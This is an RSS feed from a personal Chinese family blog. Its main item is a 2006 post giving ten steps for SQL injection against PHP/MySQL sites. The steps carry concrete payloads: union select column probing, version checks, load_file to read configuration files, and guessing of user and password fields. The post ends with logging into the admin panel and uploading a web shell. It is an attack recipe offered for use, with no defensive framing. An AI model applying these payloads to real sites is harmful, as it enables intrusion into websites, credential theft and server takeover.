<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[我爱贝贝-金东浩官方网站-记录金东浩成长岁月的日记和照片]]></title> 
<link>http://old.bbmy.net/index.php</link> 
<description><![CDATA[我爱贝贝是金东浩官方网站,网站主要以博客为主,贝爸和贝妈希望用博客日记和照片的形式记录下金东浩从小到大的成长岁月与大家分享,经常更新博客和照片是一项长期而又艰苦的工作,希望在贝爸和贝妈的精心维护下最后可以转交给金东浩自已来更新下去这也是贝爸和贝妈的心愿]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[我爱贝贝-金东浩官方网站-记录金东浩成长岁月的日记和照片]]></copyright>
<item>
<link>http://old.bbmy.net/http://bbmy.net/read.php?205</link>
<title><![CDATA[总结php注入十点基本步骤]]></title> 
<author>贝爸 &lt;bbmy@bbmy.net&gt;</author>
<category><![CDATA[]]></category>
<pubDate>Sat, 30 Dec 2006 17:09:38 +0000</pubDate> 
<guid>http://old.bbmy.net/http://bbmy.net/read.php?205</guid> 
<description>
<![CDATA[ 
	1.判断是否存在注入,加&#039;;and 1=1;and 1=2<br/>2.判断版本 and ord(mid(version(),1,1))&gt;51 /* 返回正常说明是4.0以上版本，可以用union查询<br/>3.利用order by 暴字段，在网址后加 order by 10 /* 如果返回正常说明字段大于10<br/>4.再利用union来查询准确字段，如: and 1=2 union select 1,2,3,......./*直到返回正常，说明猜到准确字段数。如过滤了空格可以用/**/代替。<br/>5.判断数据库连接帐号有没有写权限，and (select count(*) from mysql.user)&gt;0 /*如果结果返回错误，那我们只能猜解管理员帐号和密码了。<br/>6.如果返回正常，则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值，用逗号隔开)),8,9,10 /* 注：load_file(char(文件路径的ascii值，用逗号隔开))也可以用十六进制，通过这种方式读取配置文件，找到数据库连接等。<br/>7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常，说明存在这个表。<br/>8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。<br/>9.同理再猜解password字段,猜解成功再找后台登录。<br/>10.登录后台，上传shell。<br/><br/>............<br/><br/>Tags - <a href="http://old.bbmy.net/tag.php?tag=php" rel="tag">php</a> , <a href="http://old.bbmy.net/tag.php?tag=%25E6%25B3%25A8%25E5%2585%25A5" rel="tag">注入</a> , <a href="http://old.bbmy.net/tag.php?tag=%25E6%25AD%25A5%25E9%25AA%25A4" rel="tag">步骤</a>
]]>
</description>
</item><item>
<link>http://bbmy.net/read.php?205</link>
<title><![CDATA[[评论] 总结php注入十点基本步骤]]></title> 
<author> &lt;bbmy@bbmy.net&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://bbmy.net/read.php?205</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>